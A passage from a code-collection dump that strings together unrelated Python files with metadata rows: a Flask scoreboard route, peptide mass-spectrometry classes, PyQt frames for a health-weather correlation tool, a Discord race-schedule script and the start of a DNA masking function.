    hyper_seed = [ '/rhubarb/chain_scoreboard/' + fid_tstart_timestamp_hmac.rstrip('abcdefghijklmnopqrstuvwxyz') , 'Sort']
    hyper = []
    for nh in range(12):
        hyper.append( hyper_seed[:] ) # copy makes these separate data items unlike [...] * N
    table_column = {}
    nh = 0
    # [url suffix key, Chain_player_sum attribute name] per sortable column
    table_control = [['act','actions'], ['att','attacked'], ['hos','hospitalized'], ['mug','mugged'], ['res','respect'],
        ['ast','att_stale'], ['los','lost'], ['ate','att_escape'], ['dst','def_stale'], ['def','defend'], ['des','def_escape'], ['arh','perhit']]
    for cols in table_control:
        table_column[cols[0]] = cols[1]
        hyper[nh][0] += cols[0] + 'd' # string addition to each column e.g. 'resd' to the end of the URL
        nh += 1
    # get from ORM data on this chain
    # outline
    tstart_text = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ch.tstart))
    if ch.tend:
        et_text = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ch.tend))
        over = True
    else:
        et_text = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ch.et))
        over = False
    outline = [tstart_text, et_text, over]
    # members for names
    who = {}
    our_players = Chain_members.query.filter_by(pg_chain_id = ch.pg_chain_id).all()
    for p_mem in our_players:
        who[p_mem.player_id] = p_mem.player_name + '[' + str(p_mem.player_id) + ']'
    # bonus hits per attacker, used to exclude bonuses from the averages below
    bonus_list = []
    bonus_table = Bonus_events.query.filter_by(pg_chain_id = ch.pg_chain_id).all()
    for bonus in bonus_table:
        bonus_list.append([bonus.att_id, bonus.num_respect])
    # get from ORM the chain_player_summary for this chain
    summary = []
    pid2av_respect = {}
    pid2exp = {}
    player_scores = Chain_player_sum.query.filter_by(pg_chain_id = ch.pg_chain_id).all()
    for p_score in player_scores:
        # average respect scores to be computed here
        total_respect = p_score.respect # made by adding floats then coerced to int
        num_actions = p_score.actions
        # amend by subtracting bonuses
        for bonus in bonus_list:
            if bonus[0] == p_score.player_id:
                total_respect -= bonus[1]
                num_actions -= 1
        # respect per action (division)
        res_explanation = ''
        if num_actions >= 2:
            av_respect = total_respect / num_actions
            res_explanation = str(total_respect) + '/' + str(num_actions)
        elif num_actions == 1:
            av_respect = total_respect
        else:
            av_respect = 0.0
        summary.append(p_score)
        # 2 dicts passed along with the object data but not part of it
        pid2av_respect[p_score.player_id] = str(av_respect)
        pid2exp[p_score.player_id] = res_explanation
    # SORTING depends on a parameter passed to the route
    orderparm_s = orderparm[:3] # first 3 chars key the table_column dict
    if (len(orderparm) == 4) and (orderparm[-1] == 'd'):
        reverse = True
        # remove 'd' from one hyperlink so clicking it flips the direction
        nh = 0
        for cols in table_control:
            if cols[0] == orderparm_s:
                hyper[nh][0] = hyper[nh][0][:-1]
            nh += 1
    else:
        reverse = False
    # need to sort on the right property
    if orderparm_s == 'arh':
        # sorting by AverageRespectPer-Hit, which is outside the summary (array of objects)
        # copy dict into a list that's sorted; the values are strings, so
        # compare them numerically - lexical order would put '9' after '10'
        sorted_av_respect_per_hit = sorted(pid2av_respect.items(), key=lambda kv: float(kv[1]), reverse=reverse)
        # make a replacement summary list in the new order
        position = {}
        n = 0
        for x in summary:
            position[x.player_id] = n
            n += 1
        new_summary = []
        for x in sorted_av_respect_per_hit:
            new_summary.append( summary[position[x[0]]] )
        summary = new_summary
    else:
        # sorting by one of the properties in the object
        try:
            summary = sorted(summary, key=lambda one: getattr(one, table_column[orderparm_s]), reverse=reverse)
        except (KeyError, AttributeError):
            # unknown column key or missing attribute - keep the original order
            app.logger.info('sort failed - maybe bad orderparm (%s) supplied', orderparm)
    # decorate the data with a rank (n) and readable name (who)
    deco = []
    n = 1
    for x in summary:
        # .get avoids a KeyError for scorers missing from the member table
        if not who.get(x.player_id):
            who[x.player_id] = str(x.player_id)
        deco.append( [n, who[x.player_id] , x])
        n += 1
    rodb = read_sqlite.Rodb()
    faction_name = rodb.get_faction_name(f_id)
    return render_template('chain_scoreboard.html', title='Chain scoreboard', f_id=f_id, outline=outline, hyper=hyper, deco=deco, faction_name=faction_name, pid2av_respect=pid2av_respect, pid2exp=pid2exp)
#=================================================================================
def test_strength(pw):
    """Return True when *pw* is at least 8 chars and not in the banned-password table."""
    if len(pw) < 8:
        return False
    sha_hex = hashlib.sha1(pw.encode('utf-8')).hexdigest()
    # A hit in the Banned_pw table means the password is known-weak.
    return Banned_pw.query.filter_by(sha = sha_hex).first() is None
#=================================================================================
# Development entry point: run Flask's built-in server with the debugger on.
# NOTE(review): debug=True must not be used in production deployments.
if __name__ == "__main__":
    app.run(debug = True)
| realname0000/torn_game_metrics | flask_graph_work/app.py | app.py | py | 84,701 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "re.numeric",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "re.compile",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number":... |
4833398186 | import re
import json
import numbers
import numpy as np
class Composition():
    """Elemental composition (element/particle -> count) with monoisotopic mass.

    Accepts a formula string such as ``'C3H5ON'`` (all-uppercase element
    symbols; a leading ``'-'`` negates every count), the name of a single
    particle such as ``'proton'``, or a ready-made ``{element: count}`` dict.
    """

    __atom_mass = {
        # From NIST, "https://physics.nist.gov/cgi-bin/Compositions/stand_alone.pl?ele=&all=all&isotype=some"
        'neutron': 1.00866491595,
        'proton': 1.007276466621,
        'electron': 0.000548579909065,
        'H': 1.00782503223,
        'C': 12,
        'N': 14.00307400443,
        'O': 15.99491461957,
        'P': 30.97376199842,
        'S': 31.9720711744
    }

    # One "element symbol, optional count" unit of a formula string
    # (raw string avoids the invalid-escape warning for \d).
    __formula_re = re.compile(r"([A-Z][a-z]?)(\d*)")

    def __init__(self, class_input):
        if isinstance(class_input, str):
            if class_input.isupper():
                # Formula string; a leading '-' negates every count.
                sign = -1 if class_input[0] == '-' else 1
                self.composition = {sym: sign * (int(cnt) if cnt else 1)
                                    for sym, cnt in self.__formula_re.findall(class_input)}
            else:
                # Name of a single particle, e.g. 'proton'.
                self.composition = {class_input: 1}
        elif isinstance(class_input, dict):
            self.composition = class_input
        else:
            raise TypeError
        self.mass = self.mass_calculater()

    def __add__(self, other):
        """Element-wise sum; counts that cancel to exactly zero are dropped."""
        if not isinstance(other, Composition):
            return NotImplemented
        result = dict(self.composition)
        for elem, cnt in other.composition.items():
            if elem in result:
                result[elem] += cnt
                if result[elem] == 0:
                    del result[elem]
            else:
                result[elem] = cnt
        return Composition(result)

    def __sub__(self, other):
        """Element-wise difference; counts that cancel to exactly zero are dropped."""
        if not isinstance(other, Composition):
            return NotImplemented
        result = dict(self.composition)
        for elem, cnt in other.composition.items():
            if elem in result:
                result[elem] -= cnt
                if result[elem] == 0:
                    del result[elem]
            else:
                result[elem] = -cnt
        return Composition(result)

    def __mul__(self, other):
        """Scale every count by an integer (zero counts are kept, as before)."""
        if not isinstance(other, numbers.Integral):
            return NotImplemented
        return Composition({elem: other * cnt for elem, cnt in self.composition.items()})

    def __eq__(self, other):
        if isinstance(other, Composition):
            return self.composition == other.composition
        return NotImplemented

    def __gt__(self, other):
        # Ordering comparisons are by monoisotopic mass, not by composition.
        if isinstance(other, Composition):
            return self.mass > other.mass
        return NotImplemented

    def __ge__(self, other):
        if isinstance(other, Composition):
            return self.mass >= other.mass
        return NotImplemented

    def __lt__(self, other):
        if isinstance(other, Composition):
            return self.mass < other.mass
        return NotImplemented

    def __le__(self, other):
        if isinstance(other, Composition):
            return self.mass <= other.mass
        return NotImplemented

    def __hash__(self):
        # Keys are sorted so equal compositions hash equally.
        return hash(json.dumps(self.composition, sort_keys=True))

    def __repr__(self):
        return 'Composition(' + str(self.composition) + ')'

    def __str__(self):
        return 'Composition(' + str(self.composition) + ')'

    def mass_calculater(self):
        """Monoisotopic mass: sum of count * particle mass over all entries."""
        return sum(cnt * self.__atom_mass[elem] for elem, cnt in self.composition.items())

    def comp2formula(self):
        """Formula string with explicit counts, e.g. {'H': 2, 'O': 1} -> 'H2O1'."""
        return ''.join(elem + str(cnt) for elem, cnt in self.composition.items())

    @classmethod
    def output_neutron(cls):
        """Mass of a neutron (Da)."""
        return cls.__atom_mass['neutron']
class Residual_seq():
    """An amino-acid sequence: per-residue compositions, prefix masses, total mass."""

    __aa_residual_composition = {
        'A': Composition('C3H5ON'),
        'R': Composition('C6H12ON4'),
        'N': Composition('C4H6O2N2'),
        #'N(+.98)': Composition('C4H6O2N2') - Composition('NH3') + Composition('H2O'),
        'D': Composition('C4H5O3N'),
        #'C': Composition('C3H5ONS'),
        'c': Composition('C3H5ONS') - Composition('H') + Composition('C2H4ON'),
        'E': Composition('C5H7O3N'),
        'Q': Composition('C5H8O2N2'),
        #'Q(+.98)': Composition('C5H8O2N2') - Composition('NH3') + Composition('H2O'),
        'G': Composition('C2H3ON'),
        'H': Composition('C6H7ON3'),
        'I': Composition('C6H11ON'),
        #'L': Composition('C6H11ON'),
        'K': Composition('C6H12ON2'),
        'M': Composition('C5H9ONS'),
        'm': Composition('C5H9ONS') + Composition('O'),
        'F': Composition('C9H9ON'),
        'P': Composition('C5H7ON'),
        'S': Composition('C3H5O2N'),
        'T': Composition('C4H7O2N'),
        'W': Composition('C11H10ON2'),
        'Y': Composition('C9H9O2N'),
        'V': Composition('C5H9ON'),
    }

    def __init__(self, seqs):
        # Whitespace characters in the input are ignored.
        residues = [ch for ch in seqs if not ch.isspace()]
        prefix_masses = []
        running = self.__aa_residual_composition[residues[0]]
        for aa in residues[1:]:
            prefix_masses.append(running.mass)
            running = running + self.__aa_residual_composition[aa]
        self.seq = residues
        self.composition = running
        self.mass = running.mass
        prefix_masses.append(self.mass)
        # Cumulative masses of residues[:1], residues[:2], ..., the whole sequence.
        self.step_mass = np.array(prefix_masses)

    def __repr__(self):
        return str(self.seq)

    def __str__(self):
        return str(self.seq)

    @classmethod
    def reset_aadict(cls, newAAdict):
        """Replace the whole residue-composition table."""
        cls.__aa_residual_composition = newAAdict

    @classmethod
    def remove_from_aadict(cls, keys):
        """Delete the given residue codes from the table."""
        for key in keys:
            cls.__aa_residual_composition.pop(key)

    @classmethod
    def add_to_aadict(cls, additional_AAcomps):
        """Merge each {code: Composition} dict into the table."""
        for extra in additional_AAcomps:
            cls.__aa_residual_composition.update(extra)

    @classmethod
    def output_aalist(cls):
        """List of the known residue codes."""
        return list(cls.__aa_residual_composition.keys())

    @classmethod
    def output_aadict(cls):
        """The residue-composition table itself (not a copy)."""
        return cls.__aa_residual_composition

    @classmethod
    def seqs2composition_list(cls, seq):
        """Per-residue Composition objects for *seq*."""
        return [cls.__aa_residual_composition[aa] for aa in seq]

    @classmethod
    def seqs2massmap(cls, seq):
        """Per-residue monoisotopic masses for *seq*."""
        return [cls.__aa_residual_composition[aa].mass for aa in seq]
class Ion():
    """m/z arithmetic for peptide fragment ions.

    Ion offset design from http://www.matrixscience.com/help/fragmentation_help.html
    Part: Formulae to Calculate Fragment Ion m/z values
    """

    # Offsets relative to the bare residue-sum composition.
    __ion_offset = {
        'a': Composition('-CHO'),
        'a-NH3': Composition('-CHO') + Composition('-NH3'),
        'a-H2O': Composition('-CHO') + Composition('-H2O'),
        'b': Composition('-H'),
        'b-NH3': Composition('-H') + Composition('-NH3'),
        'b-H2O': Composition('-H') + Composition('-H2O'),
        #'c': Composition('NH2'),
        #'x': Composition('CO') + Composition('-H'),
        'y': Composition('H'),
        'y-NH3': Composition('H') + Composition('-NH3'),
        'y-H2O': Composition('H') + Composition('-H2O'),
        #'z': Composition('-NH2')
    }
    # As above but including the terminal atoms (N-terminal H, C-terminal OH).
    __term_ion_offset = {
        'a': Composition('-CHO') + Composition('H'),
        'a-NH3': Composition('-CHO') + Composition('-NH3') + Composition('H'),
        'a-H2O': Composition('-CHO') + Composition('-H2O') + Composition('H'),
        'b': Composition('-H') + Composition('H'),
        'b-NH3': Composition('-H') + Composition('-NH3') + Composition('H'),
        'b-H2O': Composition('-H') + Composition('-H2O') + Composition('H'),
        #'c': Composition('NH2') + Composition('H'),
        #'x': Composition('CO') + Composition('-H') + Composition('OH'),
        'y': Composition('H') + Composition('OH'),
        'y-NH3': Composition('H') + Composition('-NH3') + Composition('OH'),
        'y-H2O': Composition('H') + Composition('-H2O') + Composition('OH'),
        #'z': Composition('-NH2') + Composition('OH')
    }

    @classmethod
    def set_ionoffset_endterm(cls, nterm='H', cterm='OH'):
        """Rebuild the terminal ion offsets from __ion_offset plus the given termini."""
        result = {}
        for k in cls.__ion_offset:
            if k[0] == 'a' or k[0] == 'b' or k[0] == 'c':
                result.update({k: cls.__ion_offset[k] + Composition(nterm)})
            elif k[0] == 'x' or k[0] == 'y' or k[0] == 'z':
                result.update({k: cls.__ion_offset[k] + Composition(cterm)})
        cls.__term_ion_offset = result

    @classmethod
    def peak2sequencemz(cls, peak_mz, ion, charge=None):
        """Convert an observed peak m/z back to the neutral residue-sum mass.

        When charge is None the ion string carries it, e.g. '2b' = charge 2.
        """
        if charge is None:
            charge = int(ion[0])
            ion = ion[1:]
        return (peak_mz - Composition('proton').mass) * charge - cls.__term_ion_offset[ion].mass

    @classmethod
    def peptide2ionmz(cls, seq, ion, charge):
        """m/z of the given ion type and charge for the peptide *seq*."""
        ion_compsition = Residual_seq(seq).composition + cls.__term_ion_offset[ion] + Composition('proton') * charge
        ion_mass = ion_compsition.mass / charge
        return ion_mass

    @classmethod
    def sequencemz2ion(cls, seqmz, ion, charge=None):
        """Inverse of peak2sequencemz: residue-sum mass -> observed peak m/z."""
        if charge is None:
            charge = int(ion[0])
            ion = ion[1:]
        return (seqmz + cls.__term_ion_offset[ion].mass) / charge + Composition('proton').mass

    @classmethod
    def precursorion2mass(cls, precursor_ion_moverz, precursor_ion_charge):
        """Neutral peptide mass from the precursor ion m/z and charge."""
        # Composition('H2O') accounts for the N- and C-terminal atoms; adjust
        # this when the termini are modified (e.g. TMT labelling).
        return precursor_ion_moverz * precursor_ion_charge - Composition('H2O').mass - precursor_ion_charge * Composition('proton').mass

    @classmethod
    def add_ion(cls, ion_comps):
        """Add each {name: Composition} in *ion_comps*, then rebuild the offsets."""
        for ion_comp in ion_comps:
            cls.__ion_offset.update(ion_comp)
        cls.set_ionoffset_endterm()

    @classmethod
    def remove_ion(cls, keys):
        """Remove the named ion types, then rebuild the offsets."""
        for key in keys:
            cls.__ion_offset.pop(key)
        cls.set_ionoffset_endterm()

    @classmethod
    def reset_ions(cls, ion_comps):
        """Replace the whole ion-offset table, then rebuild the offsets."""
        cls.__ion_offset = ion_comps
        cls.set_ionoffset_endterm()

    @classmethod
    def output_ions(cls):
        """List of the supported ion-type names."""
        return list(cls.__ion_offset.keys())
| AmadeusloveIris/GraphNovo | genova/utils/BasicClass.py | BasicClass.py | py | 10,351 | python | en | code | 6 | github-code | 36 | [
{
"api_name": "re.findall",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "re.findall",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "numbers.Integral",
"line_number": 69,
"usage_type": "attribute"
},
{
"api_name": "json.dumps",
"line_nu... |
15719814735 | from PyQt5.QtWidgets import QCheckBox, QDialog, QDialogButtonBox, QTextEdit
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QFont
from src.logic import QFrameBase, error_dialog
from src.frames.default import Ui_FrameDefault
from src.frames.utils.info import Ui_FrameInfo
from src.frames.utils.kde import Ui_FrameKde
from src.frames.utils.image import Ui_FrameImage
from src.frames.utils.text import Ui_FrameText
from src.frames.utils.standard_type import Ui_FrameStandardType
from src.frames.dialogs.stds import Ui_DialogStds
from src.reports import print_report
from src.science import FACTORS_ALL
from src.science.classes import Standard
class QFrameDefault(QFrameBase, Ui_FrameDefault):
    """Start-up frame that shows the (Russian-language) user manual text."""

    # User-facing manual text rendered in the instructions pane.
    # Runtime string - do not translate or reformat.
    INSTRUCTIONS = \
        """Терминология:
* параметры погоды называются Эталонами,
* медицинские данные пациентов называются Образцами,
* отдельные факторы Образцов называются фактор-образцами
ВСЕ СТОЛБЦЫ В xlsx ФАЙЛАХ ОБЯЗАТЕЛЬНЫ К ЗАПОЛНЕНИЮ
С помощью кнопки «Добавить Пациента» заполняем данные о пациенте (все данные обязательны к заполнению) после этого, нажав кнопку «Добавить»
можно добавить пациента в базу пациентов.
С помощью кнопки «Добавить Показатели Пациента» можем выбрать пациента и базы пациентов и добавить для него показатели из xlsx файла,
нажав кнопку «Добавить показатели». При нажатии на эту кнопку можно выбрать xlsx файл с медицинскими данными пациента, они загружаются сразу четырьмя временными рядами (по факторам «без нагрузки», с физической нагрузкой», «с эмоциональной нагрузкой», «после отдыха») из xlsx-файла НА ДАННЫЙ МОМЕНТ МОЖНО ИССЛЕДОВАТЬ ТОЛЬКО КОЭФФИЦИЕНТ СИММЕТРИИ (symmetry). Столбец A – Дата в формате дд.мм.гггг и так далее столбцы BCD - параметры. Каждая ячейка – дробное число, кроме ячеек ПЕРВОГО столбца - это дата и ПОСЛЕДНЕГО - это физическое состояние пациента (строка).
С помощью кнопки «Добавить Эталон» можем выбрать xlsx файл с параметрами погоды. Столбец A – Дата в формате дд.мм.гггг и так далее столбцы BCD - параметры. Каждая ячейка – дробное число, кроме ячеек ПЕРВОГО столбца - это дата.
«Эталоны» – параметры погоды в xlsx файле расположенные в следующем порядке (Название парамера: столбец в xlsx файле):
'Дата исследования': 'date' (строка в формате дд.мм.гггг)
'Приземная скорость ветра': 'surface_wind_speed' (вещественное число, дробная часть отделяется от целой символом точки)
'Приземная температура': 'surface_temp' (вещественное число, дробная часть отделяется от целой символом точки)
'Приземная влажность': 'surface_wet' (вещественное число, дробная часть отделяется от целой символом точки)
'Приземное давление': 'surface_press' (вещественное число, дробная часть отделяется от целой символом точки)
'BX': 'bx_mmp' (вещественное число, дробная часть отделяется от целой символом точки)
'BY': 'by_mmp' (вещественное число, дробная часть отделяется от целой символом точки)
'BZ': 'bz_mmp' (вещественное число, дробная часть отделяется от целой символом точки)
'B-Vector': 'b_vector_mmp' (вещественное число, дробная часть отделяется от целой символом точки)
'Плотность протонов солнеччного ветра': 'proton_density' (вещественное число, дробная часть отделяется от целой символом точки)
'Скорость плазмы солнечного ветра': 'plasma_speed' (вещественное число, дробная часть отделяется от целой символом точки)
'Давление солнечного ветра': 'press_sun_wind' (вещественное число, дробная часть отделяется от целой символом точки)
'КР': 'kp_index' (вещественное число, дробная часть отделяется от целой символом точки)
'Радиоизлучение': 'radio_emission' (вещественное число, дробная часть отделяется от целой символом точки)
'Рентгеновское излучение Солнца-1': 'xray_sun_one' (вещественное число, дробная часть отделяется от целой символом точки)
'Рентгеновское излучение Солнца-2': 'xray_sun_two' (вещественное число, дробная часть отделяется от целой символом точки)
'Ультрофиолет-A': 'ultraviolet_a' (вещественное число, дробная часть отделяется от целой символом точки)
'Ультрофиолет-B': 'ultraviolet_b' (вещественное число, дробная часть отделяется от целой символом точки)
'Ультрофиолет-C': 'ultraviolet_c' (вещественное число, дробная часть отделяется от целой символом точки)
«Пациенты» – медицинские данные пациентов в xlsx файле расположенные в следующем порядке (Название параметра: cтолбец в xlsx файле):
'Дата исследования': 'date' (строка в формате дд.мм.гггг)
'Коэффициент симметрии': 'symmetry' (вещественное число, дробная часть отделяется от целой символом точки)
'Верхнее артериальное давление': 'upper_arterial_pressure' (вещественное число, дробная часть отделяется от целой символом точки)
'Нижнее арториальное давление': 'lower_arterial_pressure' (вещественное число, дробная часть отделяется от целой символом точки)
'chss': 'chss' (вещественное число, дробная часть отделяется от целой символом точки)
'variab': 'variab' (вещественное число, дробная часть отделяется от целой символом точки)
'Угол': 'angle' (вещественное число, дробная часть отделяется от целой символом точки)
'Состояние пациента при исследованиии': 'patients_state' (1 - без нагрузки, 2 - с физической нагрузкой, 3 - с эмоциональной нагрузкой, 4 - после отдыха)
'Физическое состояние пациента': 'physical_state' (любая строка)
В окне «Ведущий ряд» выбирается любой из загруженных файлов, затем в окне «Ведомый ряд» выбирается также любой из загруженных файлов (ряды распределения расстояний формируются от максимумов Ведомого ряда до максимумов Ведущего ряда)
В основном окне показываются фрагменты анализа в зависимости от выбранных кнопок «Все факторы», «Без нагрузки», «С физической нагрузкой», «С эмоциональной нагрузкой», «После отдыха», «Визуализация», «Статистика», «Тестирование нормальности», «4-х ядерные оценки» (график показывает ядерные оценки плотности распределений для всех факторов), «3-х ядерные оценки» (график показывает ядерные оценки плотности распределений расстояний от максимумов факторов «С физической нагрузкой», «С эмоциональной нагрузкой», «После отдыха» до фактора «Без нагрузки»)
Для формирования файла отчета (в формате docx) по выбранному эталону необходимо нажать кнопку «Сформировать отчет», в открывшемся окне выбрать фактор или все факторы и нажать кнопку «Сохранить» – будет предложено выбрать название файла и место для сохранения.
Для формирования файла отчета (в формате docx) по группе эталонов необходимо нажать кнопку «Сформировать групповой отчет», в открывшемся окне выбрать группу эталонов и фактор и нажать кнопку «Сохранить» – будет предложено выбрать название файла и место для сохранения.
"""

    def __init__(self, parent):
        QFrameBase.__init__(self, parent, Ui_FrameDefault)
        # Fill the read-only instructions pane with the manual text.
        self.add_text(QFrameDefault.INSTRUCTIONS, self.instructions_edit)
        # NOTE(review): add_text appears to tag the widget with "c_updating";
        # it is removed here because this pane is static - confirm against
        # QFrameBase.add_text.
        delattr(self.instructions_edit, "c_updating")
        font = QFont("Times New Roman", 11)
        self.instructions_edit.setFont(font)
        self.instructions_edit.verticalScrollBar().setEnabled(True)
class QFrameInfo(QFrameBase, Ui_FrameInfo):
    """Three-tab frame: report image plus 'stat' and 'ntest' text reports."""

    def __init__(self, parent, report, val_type: str = "val"):
        QFrameBase.__init__(self, parent, Ui_FrameInfo)
        self.report = report
        self.val_type = val_type
        self.frames = [
            QFrameImage(self, self.report, self.val_type),
            QFrameText(self, self.report, self.val_type, 'stat'),
            QFrameText(self, self.report, self.val_type, 'ntest'),
        ]
        # One child frame per tab, inserted at the top of each tab's layout.
        for idx, frame in enumerate(self.frames):
            self.tabs.widget(idx).layout().insertWidget(0, frame)
# TODO: remove this class and merge it into QFrameInfo
class QFrameInfoKde(QFrameBase, Ui_FrameInfo):
    """Like QFrameInfo, but the first tab holds the KDE plots frame."""

    def __init__(self, parent, report, val_type: str = "val"):
        QFrameBase.__init__(self, parent, Ui_FrameInfo)
        self.report = report
        self.val_type = val_type
        self.frames = [
            QFrameKde(self, self.report),
            QFrameText(self, self.report, self.val_type, 'stat'),
            QFrameText(self, self.report, self.val_type, 'ntest'),
        ]
        # One child frame per tab, inserted at the top of each tab's layout.
        for idx, frame in enumerate(self.frames):
            self.tabs.widget(idx).layout().insertWidget(0, frame)
# TODO: move the KDE frames somewhere more appropriate
class QFrameKde(QFrameBase, Ui_FrameKde):
    """Two-tab frame with the 4-factor ('kde') and 3-factor ('kde3') KDE plots."""

    def __init__(self, parent, report):
        QFrameBase.__init__(self, parent, Ui_FrameKde)
        self.report = report
        self.frames = [QFrameImage(self, self.report, kind) for kind in ("kde", "kde3")]
        for idx, frame in enumerate(self.frames):
            self.tabs.widget(idx).layout().insertWidget(0, frame)
class QFrameImage(QFrameBase, Ui_FrameImage):
    """Frame that displays one report image, selected by *va_type*."""

    def __init__(self, parent, report, va_type: str):
        QFrameBase.__init__(self, parent, Ui_FrameImage)
        self.report = report
        self.va_type = va_type
        self.va, self.image_name = self.get_va()
        self.add_image(self.va, self.image, self.image_name)

    # TODO: move this mapping out of the class
    def get_va(self):
        """Return (image data, image attribute name) for this frame's va_type."""
        if self.va_type == "val":
            return self.report.va, 'va_img1'
        elif self.va_type == "apl":
            return self.report.va_apl, 'va_img2'
        elif self.va_type == "kde":
            return self.report.kde, 'label_kde_img'
        elif self.va_type == "kde3":
            return self.report.kde3, 'label_kde3_img'
        # Fail loudly instead of returning None, which previously caused a
        # confusing TypeError when unpacked in __init__.
        raise ValueError("unknown va_type: {!r}".format(self.va_type))
class QFrameStandardType(QFrameBase, Ui_FrameStandardType):
    """Two-tab frame: a QFrameInfo for 'val' and one for 'apl'."""

    def __init__(self, parent, report):
        QFrameBase.__init__(self, parent, Ui_FrameStandardType)
        self.report = report
        self.frames = [QFrameInfo(self, self.report, vt) for vt in ("val", "apl")]
        for idx, frame in enumerate(self.frames):
            self.tabs.widget(idx).layout().insertWidget(0, frame)
class QFrameText(QFrameBase, Ui_FrameText):
    """Frame that shows one textual report for a (val_type, func_name) pair."""

    def __init__(self, parent, report, val_type: str, func_name: str):
        QFrameBase.__init__(self, parent, Ui_FrameText)
        self.report = report
        self.val_type = val_type    # "val", "apl" or "kde"
        self.func_name = func_name  # "stat" or "ntest"
        self.add_text(print_report('ui', self.get_func()), self.text_edit)

    # TODO: move this dispatch out of the class
    def get_func(self):
        """Return the report-generating callable for (val_type, func_name)."""
        if self.val_type == "val":
            return self.func_val()
        elif self.val_type == "apl":
            return self.func_apl()
        elif self.val_type == "kde":
            return self.func_kde()
        # Fail loudly instead of returning None, which previously crashed
        # later inside print_report with a confusing error.
        raise ValueError("unknown val_type: {!r}".format(self.val_type))

    def func_val(self):
        """'stat' -> get_report_stat, anything else -> get_report_ntest."""
        if self.func_name == "stat":
            return self.report.get_report_stat
        return self.report.get_report_ntest

    def func_apl(self):
        """'stat' -> get_report_stat_apl, anything else -> get_report_ntest_apl."""
        if self.func_name == "stat":
            return self.report.get_report_stat_apl
        return self.report.get_report_ntest_apl

    def func_kde(self):
        """'stat' -> get_report_stat3, anything else -> get_report_ntest3."""
        if self.func_name == "stat":
            return self.report.get_report_stat3
        return self.report.get_report_ntest3
class QDialogStds(QDialog, Ui_DialogStds):
    """Modal dialog asking the user for a factor and (optionally) standards.

    ``settings()`` is the intended entry point; ``self.result`` holds
    ``[factor]`` or ``[factor, stds]`` after a successful accept().
    """

    def __init__(self, parent, **kwargs):
        # noinspection PyArgumentList
        QDialog.__init__(self, parent)
        Ui_DialogStds.setupUi(self, self)
        # Number of values the dialog returns (1 = factor only).
        self.dimension = 1
        self.result = None
        # Standards (translated comment; originally "Эталоны")
        self.get_stds = kwargs.get("get_stds", False)
        self.std_main = kwargs.get("std_main", None)
        if self.get_stds:
            self.dimension += 1
        # Factors (translated comment; originally "Факторы")
        self.btn_all.setChecked(True)
        # Standards: build one checkbox per known standard, newest-looking first.
        if self.get_stds:
            self.cbs = []
            for v in reversed(sorted(list(Standard.standards.keys()))):
                self.cbs.append(QCheckBox(v, self))
                # Pre-check only the "main" standard, if one was given.
                if self.std_main is None or self.std_main != v:
                    self.cbs[-1].setChecked(False)
                else:
                    self.cbs[-1].setChecked(1)
                self.layout_stds.insertWidget(0, self.cbs[-1])
        else:
            self.layout().removeItem(self.layout_stds)
        self.buttons.button(QDialogButtonBox.Save).setText("Сохранить")
        self.buttons.button(QDialogButtonBox.Cancel).setText("Отмена")
        self.setWindowFlags(self.windowFlags() ^ Qt.WindowContextHelpButtonHint)

    def accept(self):
        """Validate selections, fill ``self.result`` and close the dialog."""
        self.result = []
        # Factors: either "all" or exactly one of btn_0..btn_3.
        if self.btn_all.isChecked():
            factor = FACTORS_ALL
        else:
            for idx in range(4):
                if self.__dict__["btn_{}".format(idx)].isChecked():
                    factor = idx
                    break
            else:
                # No factor button checked at all — reject the input.
                error_dialog("Не выбран ни один фактор/все факторы")
                return
        self.result.append(factor)
        # Standards: at least one checkbox must be ticked when requested.
        if self.get_stds:
            stds = [cb.text() for cb in self.cbs if cb.isChecked()]
            if not len(stds):
                error_dialog("Выберите по крайней мере один эталон")
                return
            self.result.append(stds)
        QDialog.accept(self)

    @staticmethod
    def settings(parent, **kwargs):
        """Run the dialog modally; return the chosen value(s) or None-filled list."""
        dialog = QDialogStds(parent, **kwargs)
        if dialog.exec():
            res = dialog.result
        else:
            res = [None] * dialog.dimension
        # Unwrap single-value results for convenience.
        return res[0] if len(res) == 1 else res
| qooteen/health-weather_correlation-master | src/logic/utils.py | utils.py | py | 17,580 | python | ru | code | 0 | github-code | 36 | [
{
"api_name": "src.logic.QFrameBase",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "src.frames.default.Ui_FrameDefault",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "src.logic.QFrameBase.__init__",
"line_number": 79,
"usage_type": "call"
},
{
... |
40943557380 | from ruamel.yaml import YAML
from datetime import datetime
from common import *
import sys
def main():
    """Print a Discord-timestamp-formatted race schedule grouped by day."""
    path = sys.argv[1] if len(sys.argv) > 1 else 'data/races.yaml'
    parser = YAML(typ='safe')
    with open(path, 'r') as handle:
        data = parser.load(handle)
    last_day = None
    for race in data['races']:
        when = datetime.fromisoformat(race['datetime']).replace(tzinfo=RACETZ)
        stamp = int(when.timestamp())
        # Emit a day header whenever the date changes.
        if last_day != when.date():
            print('')
            print(f"{when.strftime('%A')} <t:{stamp}:d>")
            last_day = when.date()
        print(f"<t:{stamp}:t> (<t:{stamp}:R>) - {race['desc']}")


if __name__ == '__main__':
    main()
| pkdawson/workrobot | print_schedule.py | print_schedule.py | py | 717 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.argv",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "ruamel.yaml.YAML",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.fromiso... |
70471621543 | # TODO : TRANSFORM INTO A CLASS AND CREATE A REPORT OF REGION TRIMMED
#~~~~~~~GLOBAL IMPORTS~~~~~~~#
# Standard library packages import
from os import remove, path
import gzip
from time import time
from sys import stdout
# Third party package import
from Bio import SeqIO
# Local library packages import
from pyDNA.Utilities import import_seq, file_basename, mkdir
from Blast import Blastn
#~~~~~~~MAIN METHODS~~~~~~~#
def mask(subject_fasta,
         hit_list,
         ref_outdir="./references/",
         ref_outname="masked_ref.fa",
         compress_ouput=True):
